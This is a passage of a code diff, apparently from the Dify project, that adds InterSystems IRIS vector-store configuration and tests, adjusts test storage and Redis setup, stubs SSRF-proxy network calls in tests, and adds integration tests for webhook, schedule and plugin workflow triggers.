BillingService.delete_account(account_id)
if dify_config.BILLING_ENABLED:
BillingService.delete_account(account_id)
except Exception:
logger.exception("Failed to delete account %s from billing service.", account_id)
raise

View File

@ -55,7 +55,7 @@ WEB_API_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,*
CONSOLE_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,*
# Vector database configuration
# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase
# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase, iris
VECTOR_STORE=weaviate
# Weaviate configuration
WEAVIATE_ENDPOINT=http://localhost:8080
@ -64,6 +64,20 @@ WEAVIATE_GRPC_ENABLED=false
WEAVIATE_BATCH_SIZE=100
WEAVIATE_TOKENIZATION=word
# InterSystems IRIS configuration
IRIS_HOST=localhost
IRIS_SUPER_SERVER_PORT=1972
IRIS_WEB_SERVER_PORT=52773
IRIS_USER=_SYSTEM
IRIS_PASSWORD=Dify@1234
IRIS_DATABASE=USER
IRIS_SCHEMA=dify
IRIS_CONNECTION_URL=
IRIS_MIN_CONNECTION=1
IRIS_MAX_CONNECTION=3
IRIS_TEXT_INDEX=true
IRIS_TEXT_INDEX_LANGUAGE=en
# Upload configuration
UPLOAD_FILE_SIZE_LIMIT=15

View File

@ -1,3 +1,4 @@
import os
import pathlib
import random
import secrets
@ -32,6 +33,10 @@ def _load_env():
_load_env()
# Override storage root to tmp to avoid polluting repo during local runs
os.environ["OPENDAL_FS_ROOT"] = "/tmp/dify-storage"
os.environ.setdefault("STORAGE_TYPE", "opendal")
os.environ.setdefault("OPENDAL_SCHEME", "fs")
_CACHED_APP = create_app()

View File

@ -0,0 +1,44 @@
"""Integration tests for IRIS vector database."""
from core.rag.datasource.vdb.iris.iris_vector import IrisVector, IrisVectorConfig
from tests.integration_tests.vdb.test_vector_store import (
AbstractVectorTest,
setup_mock_redis,
)
class IrisVectorTest(AbstractVectorTest):
"""Test suite for IRIS vector store implementation."""
def __init__(self):
"""Initialize IRIS vector test with hardcoded test configuration.
Note: Uses 'host.docker.internal' to connect from DevContainer to
host OS Docker, or 'localhost' when running directly on host OS.
"""
super().__init__()
self.vector = IrisVector(
collection_name=self.collection_name,
config=IrisVectorConfig(
IRIS_HOST="host.docker.internal",
IRIS_SUPER_SERVER_PORT=1972,
IRIS_USER="_SYSTEM",
IRIS_PASSWORD="Dify@1234",
IRIS_DATABASE="USER",
IRIS_SCHEMA="dify",
IRIS_CONNECTION_URL=None,
IRIS_MIN_CONNECTION=1,
IRIS_MAX_CONNECTION=3,
IRIS_TEXT_INDEX=True,
IRIS_TEXT_INDEX_LANGUAGE="en",
),
)
def test_iris_vector(setup_mock_redis) -> None:
"""Run all IRIS vector store tests.
Args:
setup_mock_redis: Pytest fixture for mock Redis setup
"""
IrisVectorTest().run_all_tests()

View File

@ -138,9 +138,9 @@ class DifyTestContainers:
logger.warning("Failed to create plugin database: %s", e)
# Set up storage environment variables
os.environ["STORAGE_TYPE"] = "opendal"
os.environ["OPENDAL_SCHEME"] = "fs"
os.environ["OPENDAL_FS_ROOT"] = "storage"
os.environ.setdefault("STORAGE_TYPE", "opendal")
os.environ.setdefault("OPENDAL_SCHEME", "fs")
os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage")
# Start Redis container for caching and session management
# Redis is used for storing session data, cache entries, and temporary data
@ -348,6 +348,13 @@ def _create_app_with_containers() -> Flask:
"""
logger.info("Creating Flask application with test container configuration...")
# Ensure Redis client reconnects to the containerized Redis (no auth)
from extensions import ext_redis
ext_redis.redis_client._client = None
os.environ["REDIS_USERNAME"] = ""
os.environ["REDIS_PASSWORD"] = ""
# Re-create the config after environment variables have been set
from configs import dify_config
@ -486,3 +493,29 @@ def db_session_with_containers(flask_app_with_containers) -> Generator[Session,
finally:
session.close()
logger.debug("Database session closed")
@pytest.fixture(scope="package", autouse=True)
def mock_ssrf_proxy_requests():
"""
Avoid outbound network during containerized tests by stubbing SSRF proxy helpers.
"""
from unittest.mock import patch
import httpx
def _fake_request(method, url, **kwargs):
request = httpx.Request(method=method, url=url)
return httpx.Response(200, request=request, content=b"")
with (
patch("core.helper.ssrf_proxy.make_request", side_effect=_fake_request),
patch("core.helper.ssrf_proxy.get", side_effect=lambda url, **kw: _fake_request("GET", url, **kw)),
patch("core.helper.ssrf_proxy.post", side_effect=lambda url, **kw: _fake_request("POST", url, **kw)),
patch("core.helper.ssrf_proxy.put", side_effect=lambda url, **kw: _fake_request("PUT", url, **kw)),
patch("core.helper.ssrf_proxy.patch", side_effect=lambda url, **kw: _fake_request("PATCH", url, **kw)),
patch("core.helper.ssrf_proxy.delete", side_effect=lambda url, **kw: _fake_request("DELETE", url, **kw)),
patch("core.helper.ssrf_proxy.head", side_effect=lambda url, **kw: _fake_request("HEAD", url, **kw)),
):
yield

View File

@ -240,8 +240,7 @@ class TestShardedRedisBroadcastChannelIntegration:
for future in as_completed(producer_futures, timeout=30.0):
sent_msgs.update(future.result())
subscription.close()
consumer_received_msgs = consumer_future.result(timeout=30.0)
consumer_received_msgs = consumer_future.result(timeout=60.0)
assert sent_msgs == consumer_received_msgs

View File

@ -233,7 +233,7 @@ class TestWebhookService:
"/webhook",
method="POST",
headers={"Content-Type": "multipart/form-data"},
data={"message": "test", "upload": file_storage},
data={"message": "test", "file": file_storage},
):
webhook_trigger = MagicMock()
webhook_trigger.tenant_id = "test_tenant"
@ -242,7 +242,7 @@ class TestWebhookService:
assert webhook_data["method"] == "POST"
assert webhook_data["body"]["message"] == "test"
assert "upload" in webhook_data["files"]
assert "file" in webhook_data["files"]
# Verify file processing was called
mock_external_dependencies["tool_file_manager"].assert_called_once()
@ -414,7 +414,7 @@ class TestWebhookService:
"data": {
"method": "post",
"content_type": "multipart/form-data",
"body": [{"name": "upload", "type": "file", "required": True}],
"body": [{"name": "file", "type": "file", "required": True}],
}
}

View File

@ -0,0 +1,182 @@
"""
Fixtures for trigger integration tests.
This module provides fixtures for creating test data (tenant, account, app)
and mock objects used across trigger-related tests.
"""
from __future__ import annotations
from collections.abc import Generator
from typing import Any
import pytest
from sqlalchemy.orm import Session
from models.account import Account, Tenant, TenantAccountJoin, TenantAccountRole
from models.model import App
@pytest.fixture
def tenant_and_account(db_session_with_containers: Session) -> Generator[tuple[Tenant, Account], None, None]:
"""
Create a tenant and account for testing.
This fixture creates a tenant, account, and their association,
then cleans up after the test completes.
Yields:
tuple[Tenant, Account]: The created tenant and account
"""
tenant = Tenant(name="trigger-e2e")
account = Account(name="tester", email="tester@example.com", interface_language="en-US")
db_session_with_containers.add_all([tenant, account])
db_session_with_containers.commit()
join = TenantAccountJoin(tenant_id=tenant.id, account_id=account.id, role=TenantAccountRole.OWNER.value)
db_session_with_containers.add(join)
db_session_with_containers.commit()
yield tenant, account
# Cleanup
db_session_with_containers.query(TenantAccountJoin).filter_by(tenant_id=tenant.id).delete()
db_session_with_containers.query(Account).filter_by(id=account.id).delete()
db_session_with_containers.query(Tenant).filter_by(id=tenant.id).delete()
db_session_with_containers.commit()
@pytest.fixture
def app_model(
db_session_with_containers: Session, tenant_and_account: tuple[Tenant, Account]
) -> Generator[App, None, None]:
"""
Create an app for testing.
This fixture creates a workflow app associated with the tenant and account,
then cleans up after the test completes.
Yields:
App: The created app
"""
tenant, account = tenant_and_account
app = App(
tenant_id=tenant.id,
name="trigger-app",
description="trigger e2e",
mode="workflow",
icon_type="emoji",
icon="robot",
icon_background="#FFEAD5",
enable_site=True,
enable_api=True,
api_rpm=100,
api_rph=1000,
is_demo=False,
is_public=False,
is_universal=False,
created_by=account.id,
)
db_session_with_containers.add(app)
db_session_with_containers.commit()
yield app
# Cleanup - delete related records first
from models.trigger import (
AppTrigger,
TriggerSubscription,
WorkflowPluginTrigger,
WorkflowSchedulePlan,
WorkflowTriggerLog,
WorkflowWebhookTrigger,
)
from models.workflow import Workflow
db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app.id).delete()
db_session_with_containers.query(WorkflowSchedulePlan).filter_by(app_id=app.id).delete()
db_session_with_containers.query(WorkflowWebhookTrigger).filter_by(app_id=app.id).delete()
db_session_with_containers.query(WorkflowPluginTrigger).filter_by(app_id=app.id).delete()
db_session_with_containers.query(AppTrigger).filter_by(app_id=app.id).delete()
db_session_with_containers.query(TriggerSubscription).filter_by(tenant_id=tenant.id).delete()
db_session_with_containers.query(Workflow).filter_by(app_id=app.id).delete()
db_session_with_containers.query(App).filter_by(id=app.id).delete()
db_session_with_containers.commit()
class MockCeleryGroup:
"""Mock for celery group() function that collects dispatched tasks."""
def __init__(self) -> None:
self.collected: list[dict[str, Any]] = []
self._applied = False
def __call__(self, items: Any) -> MockCeleryGroup:
self.collected = list(items)
return self
def apply_async(self) -> None:
self._applied = True
@property
def applied(self) -> bool:
return self._applied
class MockCelerySignature:
"""Mock for celery task signature that returns task info dict."""
def s(self, schedule_id: str) -> dict[str, str]:
return {"schedule_id": schedule_id}
@pytest.fixture
def mock_celery_group() -> MockCeleryGroup:
"""
Provide a mock celery group for testing task dispatch.
Returns:
MockCeleryGroup: Mock group that collects dispatched tasks
"""
return MockCeleryGroup()
@pytest.fixture
def mock_celery_signature() -> MockCelerySignature:
"""
Provide a mock celery signature for testing task dispatch.
Returns:
MockCelerySignature: Mock signature generator
"""
return MockCelerySignature()
class MockPluginSubscription:
"""Mock plugin subscription for testing plugin triggers."""
def __init__(
self,
subscription_id: str = "sub-1",
tenant_id: str = "tenant-1",
provider_id: str = "provider-1",
) -> None:
self.id = subscription_id
self.tenant_id = tenant_id
self.provider_id = provider_id
self.credentials: dict[str, str] = {"token": "secret"}
self.credential_type = "api-key"
def to_entity(self) -> MockPluginSubscription:
return self
@pytest.fixture
def mock_plugin_subscription() -> MockPluginSubscription:
"""
Provide a mock plugin subscription for testing.
Returns:
MockPluginSubscription: Mock subscription instance
"""
return MockPluginSubscription()

View File

@ -0,0 +1,911 @@
from __future__ import annotations
import importlib
import json
import time
from datetime import timedelta
from types import SimpleNamespace
from typing import Any
import pytest
from flask import Flask, Response
from flask.testing import FlaskClient
from sqlalchemy.orm import Session
from configs import dify_config
from core.plugin.entities.request import TriggerInvokeEventResponse
from core.trigger.debug import event_selectors
from core.trigger.debug.event_bus import TriggerDebugEventBus
from core.trigger.debug.event_selectors import PluginTriggerDebugEventPoller, WebhookTriggerDebugEventPoller
from core.trigger.debug.events import PluginTriggerDebugEvent, build_plugin_pool_key
from core.workflow.enums import NodeType
from libs.datetime_utils import naive_utc_now
from models.account import Account, Tenant
from models.enums import AppTriggerStatus, AppTriggerType, CreatorUserRole, WorkflowTriggerStatus
from models.model import App
from models.trigger import (
AppTrigger,
TriggerSubscription,
WorkflowPluginTrigger,
WorkflowSchedulePlan,
WorkflowTriggerLog,
WorkflowWebhookTrigger,
)
from models.workflow import Workflow
from schedule import workflow_schedule_task
from schedule.workflow_schedule_task import poll_workflow_schedules
from services import feature_service as feature_service_module
from services.trigger import webhook_service
from services.trigger.schedule_service import ScheduleService
from services.workflow_service import WorkflowService
from tasks import trigger_processing_tasks
from .conftest import MockCeleryGroup, MockCelerySignature, MockPluginSubscription
# Test constants
WEBHOOK_ID_PRODUCTION = "wh1234567890123456789012"
WEBHOOK_ID_DEBUG = "whdebug1234567890123456"
TEST_TRIGGER_URL = "https://trigger.example.com/base"
def _build_workflow_graph(root_node_id: str, trigger_type: NodeType) -> str:
"""Build a minimal workflow graph JSON for testing."""
node_data: dict[str, Any] = {"type": trigger_type.value, "title": "trigger"}
if trigger_type == NodeType.TRIGGER_WEBHOOK:
node_data.update(
{
"method": "POST",
"content_type": "application/json",
"headers": [],
"params": [],
"body": [],
}
)
graph = {
"nodes": [
{"id": root_node_id, "data": node_data},
{"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}},
],
"edges": [{"source": root_node_id, "target": "answer-1", "sourceHandle": "success"}],
}
return json.dumps(graph)
def test_publish_blocks_start_and_trigger_coexistence(
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Publishing should fail when both start and trigger nodes coexist."""
tenant, account = tenant_and_account
graph = {
"nodes": [
{"id": "start", "data": {"type": NodeType.START.value}},
{"id": "trig", "data": {"type": NodeType.TRIGGER_WEBHOOK.value}},
],
"edges": [],
}
draft_workflow = Workflow.new(
tenant_id=tenant.id,
app_id=app_model.id,
type="workflow",
version=Workflow.VERSION_DRAFT,
graph=json.dumps(graph),
features=json.dumps({}),
created_by=account.id,
environment_variables=[],
conversation_variables=[],
rag_pipeline_variables=[],
)
db_session_with_containers.add(draft_workflow)
db_session_with_containers.commit()
workflow_service = WorkflowService()
monkeypatch.setattr(
feature_service_module.FeatureService,
"get_system_features",
classmethod(lambda _cls: SimpleNamespace(plugin_manager=SimpleNamespace(enabled=False))),
)
monkeypatch.setattr("services.workflow_service.dify_config", SimpleNamespace(BILLING_ENABLED=False))
with pytest.raises(ValueError, match="Start node and trigger nodes cannot coexist"):
workflow_service.publish_workflow(session=db_session_with_containers, app_model=app_model, account=account)
def test_trigger_url_uses_config_base(monkeypatch: pytest.MonkeyPatch) -> None:
"""TRIGGER_URL config should be reflected in generated webhook and plugin endpoints."""
original_url = getattr(dify_config, "TRIGGER_URL", None)
try:
monkeypatch.setattr(dify_config, "TRIGGER_URL", TEST_TRIGGER_URL)
endpoint_module = importlib.reload(importlib.import_module("core.trigger.utils.endpoint"))
assert (
endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION)
== f"{TEST_TRIGGER_URL}/triggers/webhook/{WEBHOOK_ID_PRODUCTION}"
)
assert (
endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION, True)
== f"{TEST_TRIGGER_URL}/triggers/webhook-debug/{WEBHOOK_ID_PRODUCTION}"
)
assert (
endpoint_module.generate_plugin_trigger_endpoint_url("end-1") == f"{TEST_TRIGGER_URL}/triggers/plugin/end-1"
)
finally:
# Restore original config and reload module
if original_url is not None:
monkeypatch.setattr(dify_config, "TRIGGER_URL", original_url)
importlib.reload(importlib.import_module("core.trigger.utils.endpoint"))
def test_webhook_trigger_creates_trigger_log(
test_client_with_containers: FlaskClient,
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Production webhook trigger should create a trigger log in the database."""
tenant, account = tenant_and_account
webhook_node_id = "webhook-node"
graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK)
published_workflow = Workflow.new(
tenant_id=tenant.id,
app_id=app_model.id,
type="workflow",
version=Workflow.version_from_datetime(naive_utc_now()),
graph=graph_json,
features=json.dumps({}),
created_by=account.id,
environment_variables=[],
conversation_variables=[],
rag_pipeline_variables=[],
)
db_session_with_containers.add(published_workflow)
app_model.workflow_id = published_workflow.id
db_session_with_containers.commit()
webhook_trigger = WorkflowWebhookTrigger(
app_id=app_model.id,
node_id=webhook_node_id,
tenant_id=tenant.id,
webhook_id=WEBHOOK_ID_PRODUCTION,
created_by=account.id,
)
app_trigger = AppTrigger(
tenant_id=tenant.id,
app_id=app_model.id,
node_id=webhook_node_id,
trigger_type=AppTriggerType.TRIGGER_WEBHOOK,
status=AppTriggerStatus.ENABLED,
title="webhook",
)
db_session_with_containers.add_all([webhook_trigger, app_trigger])
db_session_with_containers.commit()
def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace:
log = WorkflowTriggerLog(
tenant_id=trigger_data.tenant_id,
app_id=trigger_data.app_id,
workflow_id=trigger_data.workflow_id,
root_node_id=trigger_data.root_node_id,
trigger_metadata=trigger_data.trigger_metadata.model_dump_json() if trigger_data.trigger_metadata else "{}",
trigger_type=trigger_data.trigger_type,
workflow_run_id=None,
outputs=None,
trigger_data=trigger_data.model_dump_json(),
inputs=json.dumps(dict(trigger_data.inputs)),
status=WorkflowTriggerStatus.SUCCEEDED,
error="",
queue_name="triggered_workflow_dispatcher",
celery_task_id="celery-test",
created_by_role=CreatorUserRole.ACCOUNT,
created_by=account.id,
)
session.add(log)
session.commit()
return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test")
monkeypatch.setattr(
webhook_service.AsyncWorkflowService,
"trigger_workflow_async",
_fake_trigger_workflow_async,
)
response = test_client_with_containers.post(f"/triggers/webhook/{webhook_trigger.webhook_id}", json={"foo": "bar"})
assert response.status_code == 200
db_session_with_containers.expire_all()
logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all()
assert logs, "Webhook trigger should create trigger log"
@pytest.mark.parametrize("schedule_type", ["visual", "cron"])
def test_schedule_poll_dispatches_due_plan(
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
mock_celery_group: MockCeleryGroup,
mock_celery_signature: MockCelerySignature,
monkeypatch: pytest.MonkeyPatch,
schedule_type: str,
) -> None:
"""Schedule plans (both visual and cron) should be polled and dispatched when due."""
tenant, _ = tenant_and_account
app_trigger = AppTrigger(
tenant_id=tenant.id,
app_id=app_model.id,
node_id=f"schedule-{schedule_type}",
trigger_type=AppTriggerType.TRIGGER_SCHEDULE,
status=AppTriggerStatus.ENABLED,
title=f"schedule-{schedule_type}",
)
plan = WorkflowSchedulePlan(
app_id=app_model.id,
node_id=f"schedule-{schedule_type}",
tenant_id=tenant.id,
cron_expression="* * * * *",
timezone="UTC",
next_run_at=naive_utc_now() - timedelta(minutes=1),
)
db_session_with_containers.add_all([app_trigger, plan])
db_session_with_containers.commit()
next_time = naive_utc_now() + timedelta(hours=1)
monkeypatch.setattr(workflow_schedule_task, "calculate_next_run_at", lambda *_args, **_kwargs: next_time)
monkeypatch.setattr(workflow_schedule_task, "group", mock_celery_group)
monkeypatch.setattr(workflow_schedule_task, "run_schedule_trigger", mock_celery_signature)
poll_workflow_schedules()
assert mock_celery_group.collected, f"Should dispatch signatures for due {schedule_type} schedules"
scheduled_ids = {sig["schedule_id"] for sig in mock_celery_group.collected}
assert plan.id in scheduled_ids
def test_schedule_visual_debug_poll_generates_event(monkeypatch: pytest.MonkeyPatch) -> None:
"""Visual mode schedule node should generate event in single-step debug."""
base_now = naive_utc_now()
monkeypatch.setattr(event_selectors, "naive_utc_now", lambda: base_now)
monkeypatch.setattr(
event_selectors,
"calculate_next_run_at",
lambda *_args, **_kwargs: base_now - timedelta(minutes=1),
)
node_config = {
"id": "schedule-visual",
"data": {
"type": NodeType.TRIGGER_SCHEDULE.value,
"mode": "visual",
"frequency": "daily",
"visual_config": {"time": "3:00 PM"},
"timezone": "UTC",
},
}
poller = event_selectors.ScheduleTriggerDebugEventPoller(
tenant_id="tenant",
user_id="user",
app_id="app",
node_config=node_config,
node_id="schedule-visual",
)
event = poller.poll()
assert event is not None
assert event.workflow_args["inputs"] == {}
def test_plugin_trigger_dispatches_and_debug_events(
test_client_with_containers: FlaskClient,
mock_plugin_subscription: MockPluginSubscription,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Plugin trigger endpoint should dispatch events and generate debug events."""
endpoint_id = "1cc7fa12-3f7b-4f6a-9c8d-1234567890ab"
debug_events: list[dict[str, Any]] = []
dispatched_payloads: list[dict[str, Any]] = []
def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response:
dispatch_data = {
"user_id": "end-user",
"tenant_id": mock_plugin_subscription.tenant_id,
"endpoint_id": _endpoint_id,
"provider_id": mock_plugin_subscription.provider_id,
"subscription_id": mock_plugin_subscription.id,
"timestamp": int(time.time()),
"events": ["created", "updated"],
"request_id": f"req-{_endpoint_id}",
}
trigger_processing_tasks.dispatch_triggered_workflows_async.delay(dispatch_data)
return Response("ok", status=202)
monkeypatch.setattr(
"services.trigger.trigger_service.TriggerService.process_endpoint",
staticmethod(_fake_process_endpoint),
)
monkeypatch.setattr(
trigger_processing_tasks.TriggerDebugEventBus,
"dispatch",
staticmethod(lambda **kwargs: debug_events.append(kwargs) or 1),
)
def _fake_delay(dispatch_data: dict[str, Any]) -> None:
dispatched_payloads.append(dispatch_data)
trigger_processing_tasks.dispatch_trigger_debug_event(
events=dispatch_data["events"],
user_id=dispatch_data["user_id"],
timestamp=dispatch_data["timestamp"],
request_id=dispatch_data["request_id"],
subscription=mock_plugin_subscription,
)
monkeypatch.setattr(
trigger_processing_tasks.dispatch_triggered_workflows_async,
"delay",
staticmethod(_fake_delay),
)
response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"hello": "world"})
assert response.status_code == 202
assert dispatched_payloads, "Plugin trigger should enqueue workflow dispatch payload"
assert debug_events, "Plugin trigger should dispatch debug events"
dispatched_event_names = {event["event"].name for event in debug_events}
assert dispatched_event_names == {"created", "updated"}
def test_webhook_debug_dispatches_event(
test_client_with_containers: FlaskClient,
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Webhook single-step debug should dispatch debug event and be pollable."""
tenant, account = tenant_and_account
webhook_node_id = "webhook-debug-node"
graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK)
draft_workflow = Workflow.new(
tenant_id=tenant.id,
app_id=app_model.id,
type="workflow",
version=Workflow.VERSION_DRAFT,
graph=graph_json,
features=json.dumps({}),
created_by=account.id,
environment_variables=[],
conversation_variables=[],
rag_pipeline_variables=[],
)
db_session_with_containers.add(draft_workflow)
db_session_with_containers.commit()
webhook_trigger = WorkflowWebhookTrigger(
app_id=app_model.id,
node_id=webhook_node_id,
tenant_id=tenant.id,
webhook_id=WEBHOOK_ID_DEBUG,
created_by=account.id,
)
db_session_with_containers.add(webhook_trigger)
db_session_with_containers.commit()
debug_events: list[dict[str, Any]] = []
original_dispatch = TriggerDebugEventBus.dispatch
monkeypatch.setattr(
"controllers.trigger.webhook.TriggerDebugEventBus.dispatch",
lambda **kwargs: (debug_events.append(kwargs), original_dispatch(**kwargs))[1],
)
# Listener polls first to enter waiting pool
poller = WebhookTriggerDebugEventPoller(
tenant_id=tenant.id,
user_id=account.id,
app_id=app_model.id,
node_config=draft_workflow.get_node_config_by_id(webhook_node_id),
node_id=webhook_node_id,
)
assert poller.poll() is None
response = test_client_with_containers.post(
f"/triggers/webhook-debug/{webhook_trigger.webhook_id}",
json={"foo": "bar"},
headers={"Content-Type": "application/json"},
)
assert response.status_code == 200
assert debug_events, "Debug event should be sent to event bus"
# Second poll should get the event
event = poller.poll()
assert event is not None
assert event.workflow_args["inputs"]["webhook_body"]["foo"] == "bar"
assert debug_events[0]["pool_key"].endswith(f":{app_model.id}:{webhook_node_id}")
def test_plugin_single_step_debug_flow(
flask_app_with_containers: Flask,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Plugin single-step debug: listen -> dispatch event -> poller receives and returns variables."""
tenant_id = "tenant-1"
app_id = "app-1"
user_id = "user-1"
node_id = "plugin-node"
provider_id = "langgenius/provider-1/provider-1"
node_config = {
"id": node_id,
"data": {
"type": NodeType.TRIGGER_PLUGIN.value,
"title": "plugin",
"plugin_id": "plugin-1",
"plugin_unique_identifier": "plugin-1",
"provider_id": provider_id,
"event_name": "created",
"subscription_id": "sub-1",
"parameters": {},
},
}
# Start listening
poller = PluginTriggerDebugEventPoller(
tenant_id=tenant_id,
user_id=user_id,
app_id=app_id,
node_config=node_config,
node_id=node_id,
)
assert poller.poll() is None
pool_key = build_plugin_pool_key(
tenant_id=tenant_id,
provider_id=provider_id,
subscription_id="sub-1",
name="created",
)
TriggerDebugEventBus.dispatch(
tenant_id=tenant_id,
event=PluginTriggerDebugEvent(
timestamp=int(time.time()),
user_id=user_id,
name="created",
request_id="req-1",
subscription_id="sub-1",
provider_id="provider-1",
),
pool_key=pool_key,
)
monkeypatch.setattr(
"services.trigger.trigger_service.TriggerService.invoke_trigger_event",
staticmethod(
lambda **_kwargs: TriggerInvokeEventResponse(
variables={"echo": "pong"},
cancelled=False,
)
),
)
event = poller.poll()
assert event is not None
assert event.workflow_args["inputs"]["echo"] == "pong"
def test_schedule_trigger_creates_trigger_log(
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Schedule trigger execution should create WorkflowTriggerLog in database."""
from tasks import workflow_schedule_tasks
tenant, account = tenant_and_account
# Create published workflow with schedule trigger node
schedule_node_id = "schedule-node"
graph = {
"nodes": [
{
"id": schedule_node_id,
"data": {
"type": NodeType.TRIGGER_SCHEDULE.value,
"title": "schedule",
"mode": "cron",
"cron_expression": "0 9 * * *",
"timezone": "UTC",
},
},
{"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}},
],
"edges": [{"source": schedule_node_id, "target": "answer-1", "sourceHandle": "success"}],
}
published_workflow = Workflow.new(
tenant_id=tenant.id,
app_id=app_model.id,
type="workflow",
version=Workflow.version_from_datetime(naive_utc_now()),
graph=json.dumps(graph),
features=json.dumps({}),
created_by=account.id,
environment_variables=[],
conversation_variables=[],
rag_pipeline_variables=[],
)
db_session_with_containers.add(published_workflow)
app_model.workflow_id = published_workflow.id
db_session_with_containers.commit()
# Create schedule plan
plan = WorkflowSchedulePlan(
app_id=app_model.id,
node_id=schedule_node_id,
tenant_id=tenant.id,
cron_expression="0 9 * * *",
timezone="UTC",
next_run_at=naive_utc_now() - timedelta(minutes=1),
)
app_trigger = AppTrigger(
tenant_id=tenant.id,
app_id=app_model.id,
node_id=schedule_node_id,
trigger_type=AppTriggerType.TRIGGER_SCHEDULE,
status=AppTriggerStatus.ENABLED,
title="schedule",
)
db_session_with_containers.add_all([plan, app_trigger])
db_session_with_containers.commit()
# Mock AsyncWorkflowService to create WorkflowTriggerLog
def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace:
log = WorkflowTriggerLog(
tenant_id=trigger_data.tenant_id,
app_id=trigger_data.app_id,
workflow_id=published_workflow.id,
root_node_id=trigger_data.root_node_id,
trigger_metadata="{}",
trigger_type=AppTriggerType.TRIGGER_SCHEDULE,
workflow_run_id=None,
outputs=None,
trigger_data=trigger_data.model_dump_json(),
inputs=json.dumps(dict(trigger_data.inputs)),
status=WorkflowTriggerStatus.SUCCEEDED,
error="",
queue_name="schedule_executor",
celery_task_id="celery-schedule-test",
created_by_role=CreatorUserRole.ACCOUNT,
created_by=account.id,
)
session.add(log)
session.commit()
return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test")
monkeypatch.setattr(
workflow_schedule_tasks.AsyncWorkflowService,
"trigger_workflow_async",
_fake_trigger_workflow_async,
)
# Mock quota to avoid rate limiting
from enums import quota_type
monkeypatch.setattr(quota_type.QuotaType.TRIGGER, "consume", lambda _tenant_id: quota_type.unlimited())
# Execute schedule trigger
workflow_schedule_tasks.run_schedule_trigger(plan.id)
# Verify WorkflowTriggerLog was created
db_session_with_containers.expire_all()
logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all()
assert logs, "Schedule trigger should create WorkflowTriggerLog"
assert logs[0].trigger_type == AppTriggerType.TRIGGER_SCHEDULE
assert logs[0].root_node_id == schedule_node_id
@pytest.mark.parametrize(
("mode", "frequency", "visual_config", "cron_expression", "expected_cron"),
[
# Visual mode: hourly
("visual", "hourly", {"on_minute": 30}, None, "30 * * * *"),
# Visual mode: daily
("visual", "daily", {"time": "3:00 PM"}, None, "0 15 * * *"),
# Visual mode: weekly
("visual", "weekly", {"time": "9:00 AM", "weekdays": ["mon", "wed", "fri"]}, None, "0 9 * * 1,3,5"),
# Visual mode: monthly
("visual", "monthly", {"time": "10:30 AM", "monthly_days": [1, 15]}, None, "30 10 1,15 * *"),
# Cron mode: direct expression
("cron", None, None, "*/5 * * * *", "*/5 * * * *"),
],
)
def test_schedule_visual_cron_conversion(
mode: str,
frequency: str | None,
visual_config: dict[str, Any] | None,
cron_expression: str | None,
expected_cron: str,
) -> None:
"""Schedule visual config should correctly convert to cron expression."""
node_config: dict[str, Any] = {
"id": "schedule-node",
"data": {
"type": NodeType.TRIGGER_SCHEDULE.value,
"mode": mode,
"timezone": "UTC",
},
}
if mode == "visual":
node_config["data"]["frequency"] = frequency
node_config["data"]["visual_config"] = visual_config
else:
node_config["data"]["cron_expression"] = cron_expression
config = ScheduleService.to_schedule_config(node_config)
assert config.cron_expression == expected_cron, f"Expected {expected_cron}, got {config.cron_expression}"
assert config.timezone == "UTC"
assert config.node_id == "schedule-node"
def test_plugin_trigger_full_chain_with_db_verification(
test_client_with_containers: FlaskClient,
db_session_with_containers: Session,
tenant_and_account: tuple[Tenant, Account],
app_model: App,
monkeypatch: pytest.MonkeyPatch,
) -> None:
"""Plugin trigger should create WorkflowTriggerLog and WorkflowPluginTrigger records."""
tenant, account = tenant_and_account
# Create published workflow with plugin trigger node
plugin_node_id = "plugin-trigger-node"
provider_id = "langgenius/test-provider/test-provider"
subscription_id = "sub-plugin-test"
endpoint_id = "2cc7fa12-3f7b-4f6a-9c8d-1234567890ab"
graph = {
"nodes": [
{
"id": plugin_node_id,
"data": {
"type": NodeType.TRIGGER_PLUGIN.value,
"title": "plugin",
"plugin_id": "test-plugin",
"plugin_unique_identifier": "test-plugin",
"provider_id": provider_id,
"event_name": "test_event",
"subscription_id": subscription_id,
"parameters": {},
},
},
{"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}},
],
"edges": [{"source": plugin_node_id, "target": "answer-1", "sourceHandle": "success"}],
}
